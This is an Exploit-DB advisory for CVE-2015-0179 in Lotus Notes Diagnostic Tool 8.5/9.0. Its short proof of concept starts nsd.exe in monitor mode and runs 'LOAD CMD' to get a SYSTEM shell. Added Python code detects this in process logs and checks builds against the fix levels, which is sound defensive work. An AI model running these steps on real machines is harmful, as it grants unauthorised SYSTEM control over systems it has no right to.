ID EDB-ID:42605 Type exploitdb Reporter Exploit-DB Modified 2017-09-02T00:00:00
Description
Lotus Notes Diagnostic Tool 8.5/9.0 - Privilege Escalation. CVE-2015-0179. Local exploit for Windows platform
# Exploit Title: Lotus Notes Diagnostic Tool (nsd.exe) Privilege Escalation
# Date: 02-09-2017
# Exploit Author: ParagonSec
# Website: https://github.com/paragonsec
# Version: 8.5 & 9.0
# Tested on: Windows 7 Enterprise
# CVE: CVE-2015-0179
# Vendor CVE URL: http://www-01.ibm.com/support/docview.wss?uid=swg21700029
# Category: Local & Privilege Escalation Exploit
1. Description
Lotus Notes Diagnostic Tool (nsd.exe) runs with NT AUTHORITY\SYSTEM rights.
Because its interactive mode lets the operator start other programs, this can
be leveraged to run a program in the System context and elevate local
privileges.
2. Proof of Concept
First, start nsd.exe in its monitor/CLI mode:
> nsd.exe -monitor
Next, once NSD has finished loading, any program can be executed in the System context. In this example we execute CMD:
nsd> LOAD CMD
cmd.exe is now running as System.
NSD can also be used to attach to or kill processes, or to create memory dumps, all in the System context.
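From the defender's side, the behaviour described above leaves a recognisable trace in process-creation telemetry: nsd.exe entering monitor mode, followed by a child of nsd.exe running as SYSTEM. The detection logic below is an added example and not part of the advisory; it assumes the loaded program appears as a child process of nsd.exe, uses Sysmon Event ID 1 field names (Image, ParentImage, User, CommandLine) over a constructed pipe-separated record format, and the Notes install path is made up.

```python
import ntpath

# Constructed sample process-creation events in a Sysmon Event ID 1 style.
# The field names are Sysmon's; the values, the install path and the
# 'key=value|key=value' layout are made up for this example.
SAMPLE_EVENTS = """\
Image=C:\\Windows\\System32\\cmd.exe|ParentImage=C:\\Program Files\\IBM\\Notes\\nsd.exe|User=NT AUTHORITY\\SYSTEM|CommandLine=cmd
Image=C:\\Windows\\System32\\notepad.exe|ParentImage=C:\\Windows\\explorer.exe|User=CORP\\alice|CommandLine=notepad.exe
Image=C:\\Program Files\\IBM\\Notes\\nsd.exe|ParentImage=C:\\Windows\\System32\\cmd.exe|User=NT AUTHORITY\\SYSTEM|CommandLine=nsd.exe -monitor
Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|ParentImage=C:\\Program Files\\IBM\\Notes\\NSD.EXE|User=NT AUTHORITY\\SYSTEM|CommandLine=powershell
"""

# Interactive shells spawned from the nsd> prompt are the highest-signal case.
SHELLS = {"cmd.exe", "powershell.exe"}


def parse_event(line):
    """Split one 'k=v|k=v' record (constructed format) into a dict."""
    return dict(field.split("=", 1) for field in line.split("|"))


def flag_nsd_children(text):
    """Return (severity, image, reason) for each suspicious event.

    Signal 1: nsd.exe started in monitor/CLI mode (low severity on its own).
    Signal 2: a process whose parent is nsd.exe and that runs as SYSTEM,
              i.e. something LOADed from the nsd> prompt (medium; shells high).
    """
    hits = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ev = parse_event(line)
        child = ntpath.basename(ev.get("Image", "")).lower()
        parent = ntpath.basename(ev.get("ParentImage", "")).lower()
        user = ev.get("User", "")
        if child == "nsd.exe" and "-monitor" in ev.get("CommandLine", "").lower():
            hits.append(("low", child, "nsd.exe started in monitor mode"))
        if parent == "nsd.exe" and user.upper() == "NT AUTHORITY\\SYSTEM":
            severity = "high" if child in SHELLS else "medium"
            hits.append((severity, child, "child of nsd.exe running as SYSTEM"))
    return hits


if __name__ == "__main__":
    for hit in flag_nsd_children(SAMPLE_EVENTS):
        print(hit)
```

In a real deployment the same two conditions translate directly into a SIEM rule keyed on ParentImage ending in nsd.exe; correlating signal 1 with signal 2 from the same host within a short window cuts down noise from legitimate diagnostic runs.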
3. Solution
This has been fixed in releases 9.0.1 FP3 and 8.5.3 FP6.
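To check an inventory of Notes installs against those fix levels, the version strings have to be compared as (major, minor, maintenance, fixpack) tuples rather than as text, so that "8.5.3 FP6" sorts above "8.5.3" and "9.0" is recognised as below "9.0.1 FP3". The checker below is an added example, not code from the advisory; the fix levels come from the Solution section, and the accepted version syntax ("8.5.3 FP6", "9.0.1FP3", "8.5") is an assumption.

```python
import re

# Fix levels stated in the advisory, keyed by release branch (major.minor).
# Tuples are (major, minor, maintenance release, fix pack).
FIXED_IN = {"8.5": (8, 5, 3, 6), "9.0": (9, 0, 1, 3)}

# Accepts forms like '8.5.3 FP6', '9.0.1FP3', '8.5' (syntax is an assumption).
_VERSION_RE = re.compile(r"^\s*(\d+)\.(\d+)(?:\.(\d+))?\s*(?:FP\s*(\d+))?\s*$", re.I)


def parse_notes_version(text):
    """Turn a Notes/Domino version string into a comparable 4-tuple.
    A missing maintenance release or fix pack counts as 0."""
    m = _VERSION_RE.match(text)
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    major, minor, maint, fp = m.groups()
    return (int(major), int(minor), int(maint or 0), int(fp or 0))


def is_vulnerable(text):
    """True if the build is below the fix level for its branch, False if at
    or above it, None for branches the advisory does not cover (e.g. 10.x)."""
    v = parse_notes_version(text)
    fixed = FIXED_IN.get(f"{v[0]}.{v[1]}")
    if fixed is None:
        return None
    return v < fixed


if __name__ == "__main__":
    for s in ("8.5.3 FP5", "8.5.3 FP6", "9.0", "9.0.1FP3", "10.0.1"):
        print(s, "->", is_vulnerable(s))
```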